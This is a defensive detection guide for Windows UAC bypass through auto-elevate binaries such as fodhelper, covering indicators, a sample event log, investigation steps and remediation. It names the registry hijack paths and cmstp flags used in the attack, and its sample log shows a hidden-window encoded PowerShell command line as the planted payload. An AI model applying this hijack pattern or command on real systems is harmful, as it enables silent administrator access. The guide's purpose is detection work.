UAC Bypass Detection — Privilege Escalation Without a Prompt

MITRE ATT&CK

Security Relevance

UAC is the boundary between medium-integrity (standard user) and high-integrity (admin) execution on Windows. Bypassing it silently allows an attacker to escalate privileges without alerting the user or requiring credentials — turning a limited foothold into full administrator access. UAC bypass is almost always followed immediately by credential dumping, persistence installation, or lateral movement, making detection of the bypass itself a critical early-warning signal. Most bypass techniques abuse built-in 'auto-elevate' Windows binaries that Windows implicitly trusts to run at high integrity.

Indicators of Malicious Use

• ⚑fodhelper.exe, eventvwr.exe, sdclt.exe, cmstp.exe, or DiskCleanup.exe spawning cmd.exe, powershell.exe, or a non-standard child — these binaries have no legitimate child-process behavior
• ⚑Event ID 4657 (registry value set) in HKCU\Software\Classes\ms-settings\shell\open\command or HKCU\Software\Classes\mscfile\shell\open\command immediately before an auto-elevate binary runs
• ⚑Event ID 4688 showing a new high-integrity process (check mandatory label via Sysmon or EDR) spawned without a corresponding 4648 credential use or UAC consent event
• ⚑Event ID 4104 containing Set-ItemProperty or New-Item commands targeting HKCU\Software\Classes registry paths
• ⚑cmstp.exe launched with /ni /s flags and an INF file path — classic cmstp UAC bypass signature
• ⚑Process creation showing wscript.exe or mshta.exe as parent of an elevated shell — indicates script-based COM elevation

Example Log Entry

Event ID: 4688 — Process Creation
Creator Process: C:\Windows\System32\fodhelper.exe
New Process:     C:\Windows\System32\cmd.exe          ← unexpected child of fodhelper
Token Elevation: TokenElevationTypeFull (2)             ← high integrity — no UAC prompt shown
Command Line:    cmd.exe /c powershell -nop -w hidden -enc <base64>
Logon ID:        0x3E7

Prior Event ID 4657 (2 seconds earlier):
Object Name:     \REGISTRY\USER\S-1-5-21-...\Software\Classes\ms-settings\shell\open\command
Operation:       %%1904 (New registry value created)
Process Name:    powershell.exe
New Value:       cmd.exe /c powershell -nop -w hidden -enc <base64>

Investigation Steps

1. 1.Identify the auto-elevate binary involved (fodhelper, eventvwr, sdclt, cmstp, DiskCleanup). Search Event ID 4688 for that binary and its child processes — the child is what the attacker wanted to run elevated.
2. 2.Check Event ID 4657 for registry writes to HKCU\Software\Classes in the 60 seconds before the bypass binary ran. The written value is the attacker's payload command.
3. 3.Examine the child process command line for secondary payloads: encoded PowerShell, downloads, credential dumping commands, or network connections.
4. 4.Check Event ID 4624 for the session context — identify the original user account and how the initial foothold was obtained (phishing, lateral movement, etc.).
5. 5.Search Event ID 4688 for the processes the elevated shell spawned next — UAC bypass is almost always immediately followed by another action (credential dumping, persistence, lateral movement).
6. 6.Review Event ID 4104 (PowerShell script block) around the same timeframe for the registry manipulation script. Invoke-Expression, Set-ItemProperty, and New-ItemProperty targeting HKCU\Software\Classes are common patterns.
7. 7.Clean up: delete the malicious HKCU\Software\Classes registry keys, terminate the elevated process, and contain the host. Then trace back to determine the initial access vector.
8. 8.Determine scope: if the attacker achieved high integrity, assume credential dumping is imminent or already occurred — check LSASS access events (4663) and initiate credential rotation for accounts that had sessions on the host.

Common False Positives

• ◎Some legitimate software (notably older installers and system utilities) uses auto-elevate binaries during setup. Correlate with known software deployment windows and check the child process signature.
• ◎fodhelper.exe has a legitimate role in Windows Settings — it occasionally spawns system processes. The key indicator is an unexpected or unsigned child process, especially with an encoded or obfuscated command line.
• ◎Red team tools (Cobalt Strike, Metasploit) and penetration testing frameworks commonly test UAC bypass — coordinate with your security team before escalating detections during authorized engagements.
• ◎Is UAC bypass the same as privilege escalation? Not exactly — UAC bypass elevates within an already-compromised account's context (medium → high integrity). It does not grant access to other accounts. A true privilege escalation would gain SYSTEM or a different user's rights.

Remediation

• ✓Set UAC to 'Always notify' (the highest setting) in Group Policy — this forces a prompt even for auto-elevate binaries and eliminates most registry hijack bypasses.
• ✓Enable Windows Defender Attack Surface Reduction (ASR) rules, specifically 'Block abuse of exploited vulnerable signed drivers' and process creation rules that flag known bypass binaries spawning shells.
• ✓Monitor HKCU\Software\Classes registry writes via audit policy (Object Access → Registry) or Sysmon EventID 13 (RegistryEvent). Alert on any write to shell\open\command subkeys.
• ✓Deploy application allowlisting (Windows Defender Application Control or AppLocker) to prevent unsigned or unexpected binaries from running at high integrity.
• ✓Ensure standard users are not members of the local Administrators group — UAC bypass only works if the current user is in the Administrators group. Least-privilege enforcement removes the precondition.

Related Event IDs

Related Detection Guides

Frequently Asked Questions

Does UAC bypass work on all Windows versions?

Individual bypass techniques are version-specific and Microsoft regularly patches them. However, new bypass methods are continuously discovered — the underlying attack surface (auto-elevate binaries, COM elevation, scheduled tasks) exists in all supported Windows versions. The fodhelper bypass works on Windows 10 and 11. Techniques that work on one build may be patched in the next, so attackers typically probe multiple methods.

Why doesn't antivirus reliably detect UAC bypass?

UAC bypass techniques primarily use signed, legitimate Windows binaries (fodhelper.exe, eventvwr.exe) as the elevation vehicle — AV cannot block these. The malicious component is a registry key write to HKCU, which is a normal operation. Only the combination of the registry write + auto-elevate binary spawn + unexpected child process reveals the attack. Behavioral detection (EDR) is far more effective than signature-based AV for this technique.

Is UAC bypass possible on standard user accounts?

No. UAC bypass techniques require the current user to be a member of the local Administrators group. Standard users (non-administrators) cannot elevate via UAC bypass — they would need a true privilege escalation vulnerability. This is why enforcing least privilege (standard user accounts for daily work) is the most effective defense: it eliminates the precondition for UAC bypass entirely.